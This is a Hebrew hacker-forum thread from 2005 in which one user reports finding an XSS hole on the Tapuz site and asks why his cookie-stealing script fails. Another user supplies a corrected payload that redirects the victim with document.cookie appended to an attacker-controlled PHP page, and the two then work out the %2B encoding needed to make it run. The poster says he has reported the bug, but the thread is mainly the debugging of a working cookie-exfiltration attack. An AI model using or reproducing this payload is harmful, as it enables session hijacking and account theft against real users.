19/04/2005 22:04:45
nickless
אז ככה... מצאתי בתפוז XSS ועשיתי שישלח אליי את העוגיות אל דף PHP שהכנתי... קוד:<script>window.location=’הדף שלי?n=(document.cookie)’;</script>
עכשיו זה שולח לי הכל טוב ויפה...אבל זה שולח לי שn=(document.cookie) ניסיתי גם ככה document.write(document.cookie) גם לא פעל..... מישהו יודע למה? חחח וד"א אני לא מתכוון לנצל את זה כבר שלחתי להם הודעה על זה
תודה [ההודעה נערכה על-ידי nickless ב-19/04/2005 22:06:33]
19/04/2005 22:37:19
cp77fk4r
א- לפי הסטרינג ששמת פה, הקוקיז לא אמור להגיע לקובץ php שיצרת, אלה סתם להיות קיים, בכדי להציג אותו תעשה קוד: Alert(Document.cookie);
ובשביל לשלוח את הערך של "Document.cookie" ולא את המחרוזת "Document.cookie" אתה צריך להוציא אותו מה" " (גרשיים) ע"י: קוד: window.location = ’http://bla/com/cookies.php?cookie=’ + document.cookie;
תהנה.[ההודעה נערכה על-ידי cp77fk4r ב-19/04/2005 22:41:40]
20/04/2005 00:02:11
nickless
בע בסוף זה היה %2B במקום +...
20/04/2005 04:47:05
cp77fk4r
סבבה, אבל בקוד שנתת ראיתי שבכלל לא השתמשת ב+ או אפילו לא ציינת לדפדפן לשלוח את הקוד לעמוד המבוקש..
20/04/2005 11:32:49
nickless
חחחחח כן כי אני לא יודע יותר מJS בסיסי.... נעזרתי בטקסט של notkok משהו והוא בכלל לא נכון...כאילו החלק הזה לפחות
20/04/2005 12:20:10
cp77fk4r
תחפש באחד הגליונות של IKP, אני חושב שזה הגליון החמישי במספרו, או שתכנס לכאן: